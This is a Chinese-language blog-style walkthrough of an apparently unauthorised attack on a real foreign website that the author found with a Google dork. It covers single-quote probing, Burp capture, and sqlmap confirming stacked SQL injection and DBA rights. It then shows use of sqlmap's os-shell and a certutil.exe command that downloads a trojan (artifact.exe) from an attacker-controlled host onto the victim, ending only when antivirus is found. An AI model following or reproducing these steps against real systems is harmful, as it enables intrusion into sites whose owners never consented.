0x00:尋找漏洞點
某天閑著無聊用谷歌語法inurl:aspx?id=找到一個國外的某個站點。功能點比較簡單只有一個User ID:
0x01:檢測功能點
由于只有搜索框我們先來一個單引號看他是否報錯報。
我們發(fā)現(xiàn)報錯了單引號,我們再來一個單引號測試一下看看能不能回顯,頁面正常。
我們發(fā)現(xiàn)隨便輸入點內(nèi)容網(wǎng)站回顯正常提示xxxx。說明有可能存在sql注入,我們繼續(xù)往下看。
0x02:信息收集
這里利用火狐瀏覽器的WAppalyzer插件看了一下網(wǎng)站信息。IIS版本為7.5有文件上傳IIS解析漏洞。
下面是用在線網(wǎng)站探查到的端口情況,還開一個1433端口。
0x03:Burp抓包+sqlmap檢測
既然剛才前面的輸入框會引起報錯有可能存在sql注入那我是否可以考慮抓個數(shù)據(jù)包放到sqlmap里面跑跑看能不能跑出一些關(guān)鍵信息。下面利用Burp抓到包然后保存為x.txt。這里們加*號就是指定注入點。
放到sqlmap里面,已經(jīng)提示可以注入。
我們繼續(xù)往下看,下面是注入點。
有堆疊注入我們看看堆疊可以直接sqlmap --is-dba 看看是不是管理員權(quán)限如果我們可以利用sqlmap –-os-shelll 直接寫入木馬 拿到webshell或者反彈shell直接
這里看到dba的權(quán)限為True代表有機會寫入一句話從而獲取到也給低權(quán)限的shell。
這里可以直接sqlmap –os-shell,當出現(xiàn)os-shell的時候代表成功。
我們輸入一條ipconfig簡單命令看看能不能執(zhí)行成功。然后判斷目標是否出網(wǎng)!如果不出網(wǎng)那傳木馬上去就扯犢子了,可以選擇傳webshell。
我們可以看到命令可以執(zhí)行
接下可以使用certutil.exe去接收一個惡意的文件。
命令certutil.exe -urlcache -split -f http:
//192.168.163.128:8080/artifact.exe c:artifact.exe // c:artifact.exe是保存路徑
這條命令遠程下載文件木馬保存到受害機上去
先查看一下當前的進程。
然后使用在線的殺毒識別。結(jié)果發(fā)現(xiàn)還真有防護,就此放棄。。。。。。